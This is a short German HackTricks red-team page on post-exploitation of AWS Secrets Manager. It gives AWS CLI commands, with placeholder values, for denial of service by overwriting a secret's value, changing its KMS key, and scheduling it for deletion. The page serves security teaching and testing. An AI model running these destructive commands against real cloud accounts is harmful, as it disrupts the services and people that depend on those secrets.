AWS - Secrets Manager Post Exploitation

Erlernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

Secrets Manager

Für weitere Informationen siehe:

pageAWS - Secrets Manager Enum

Geheime lesen

Die Geheimnisse selbst sind sensible Informationen, überprüfen Sie die Privilege-Escalation-Seite, um zu erfahren, wie man sie liest.

DoS Ändern des Geheimniswerts

Durch Ändern des Werts des Geheimnisses könnten Sie alle Systeme, die von diesem Wert abhängen, DoS-angreifen.

Beachten Sie, dass vorherige Werte ebenfalls gespeichert sind, daher ist es einfach, zum vorherigen Wert zurückzukehren.

```bash # Requires permission secretsmanager:PutSecretValue aws secretsmanager put-secret-value \ --secret-id MyTestSecret \ --secret-string "{\"user\":\"diegor\",\"password\":\"EXAMPLE-PASSWORD\"}" ``` ### DoS Ändern des KMS-Schlüssels ```bash aws secretsmanager update-secret \ --secret-id MyTestSecret \ --kms-key-id arn:aws:kms:us-west-2:123456789012:key/EXAMPLE1-90ab-cdef-fedc-ba987EXAMPLE ``` ### DoS Löschen von Geheimnissen

Die minimale Anzahl von Tagen, um ein Geheimnis zu löschen, beträgt 7.

aws secretsmanager delete-secret \
--secret-id MyTestSecret \
--recovery-window-in-days 7
Erlernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

Last updated